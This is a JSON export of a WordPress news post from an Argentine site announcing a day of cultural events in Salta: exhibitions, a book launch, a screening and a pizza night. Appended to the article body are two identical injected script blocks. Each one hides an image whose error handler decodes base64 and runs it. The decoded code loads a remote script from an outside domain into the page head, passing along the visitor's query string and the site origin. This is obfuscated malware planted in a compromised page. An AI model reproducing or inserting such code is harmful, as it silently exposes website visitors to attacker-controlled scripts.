{"id":5053,"date":"2025-04-11T10:42:26","date_gmt":"2025-04-11T13:42:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5053"},"modified":"2025-08-13T23:36:25","modified_gmt":"2025-08-14T02:36:25","slug":"salta-propone-una-agenda-cultural-completa-para-este-viernes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5053","title":{"rendered":"Salta propone una agenda cultural completa para este viernes"},"content":{"rendered":"\n<p><strong><em>Se ofrecer\u00e1 una jornada imperdible este viernes: muestras, literatura, cine y gastronom\u00eda en el marco del 48\u00b0 Abril Cultural Salte\u00f1o.<\/em><\/strong><\/p>\n\n\n\n<p>Este viernes 11 de abril, el&nbsp;<strong>48\u00b0 Abril Cultural Salte\u00f1o<\/strong>&nbsp;despliega una intensa y variada programaci\u00f3n con propuestas que invitan a recorrer la ciudad a trav\u00e9s del arte, la literatura, el cine y la gastronom\u00eda.<\/p>\n\n\n\n<p>La jornada comienza a las 11&nbsp;en el Centro Cultural Am\u00e9rica (Mitre 23), con la inauguraci\u00f3n de la muestra pl\u00e1stica de Ago P\u00e1ez Vilar\u00f3 y una exhibici\u00f3n de la colecci\u00f3n privada de Cristi\u00e1n Oschileewski. Esta \u00faltima re\u00fane a seis reconocidos artistas chilenos: Alejandra Parra, Bruna Solari, Carlos Araya, Concepci\u00f3n Balmes, Nelson Plaza y Voluspa Jarpa.<\/p>\n\n\n\n<p>A las 18 horas, en la Biblioteca de la Legislatura (Mitre 550), se proyectar\u00e1 el audiovisual \u201cUn recorrido hist\u00f3rico, arquitect\u00f3nico y cultural de la provincia de Salta\u201d, una iniciativa organizada por la Mesa Panamericana Macacha G\u00fcemes.<\/p>\n\n\n\n<p>La franja de las 19 horas ser\u00e1 especialmente activa, con m\u00faltiples espacios abriendo sus puertas al p\u00fablico. En la Biblioteca Provincial (Sarmiento y Belgrano) se presentar\u00e1 el libro \u201cCamino en las sombras\u201d de Marcelo L\u00f3pez Arias. Al mismo tiempo, en el Hotel Design Suites Salta (Av. Belgrano y Pasaje Castro 216), Jorge Cornejo Albrecht inaugurar\u00e1 una selecci\u00f3n especial de sus obras pl\u00e1sticas. Tambi\u00e9n a esa hora, en el Sal\u00f3n \u00c1baco (Belgrano 1461), se presentar\u00e1 la muestra colectiva \u201cCaminos\u201d, con dibujos, fotograf\u00edas y pinturas de artistas como Aguero, Armesto, Burgos, Callej\u00f3n, Constant, Castillo, Cubile-Lecuona, L\u00f3pez, Medeiro, Moreno, Molina, N\u2019 Toledo, Ybrahim y Abdala.<\/p>\n\n\n\n<p>A esta nutrida agenda se suma una actividad muy esperada por quienes conocen y valoran el trabajo de Isidoro Zang. Con mucha alegr\u00eda, se inaugura un nuevo ciclo de micro muestras en el espacio de Alvarado 570, con la muestra fotogr\u00e1fica \u201cEl estado natural de las cosas\u201d, del reconocido artista. La curadur\u00eda y el texto est\u00e1n a cargo de Guillermo Pucci, y la exhibici\u00f3n contar\u00e1 con la participaci\u00f3n como artista invitada de Lila Zang.<\/p>\n\n\n\n<p>La jornada culminar\u00e1 con un encuentro de sabor y celebraci\u00f3n en la Sociedad Italiana (Zuvir\u00eda 380), donde a partir de las 21 se vivir\u00e1 \u201cLa noche de la pizza e birra\u201d, una fiesta con esp\u00edritu italiano que contar\u00e1 con la presencia de Magdalena Sorio como invitada especial. Las entradas tienen costo y se consiguen en la boleter\u00eda del lugar.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se ofrecer\u00e1 una jornada imperdible este viernes: muestras, literatura, cine y gastronom\u00eda en el marco del 48\u00b0 Abril Cultural Salte\u00f1o. Este viernes 11 de abril, el&nbsp;48\u00b0 Abril Cultural Salte\u00f1o&nbsp;despliega una intensa y variada programaci\u00f3n con propuestas que invitan a recorrer la ciudad a trav\u00e9s del arte, la literatura, el cine y la gastronom\u00eda. La jornada [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5054,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-5053","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5053"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5053"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5053\/revisions"}],"predecessor-version":[{"id":6522,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5053\/revisions\/6522"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5054"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5053"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5053"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}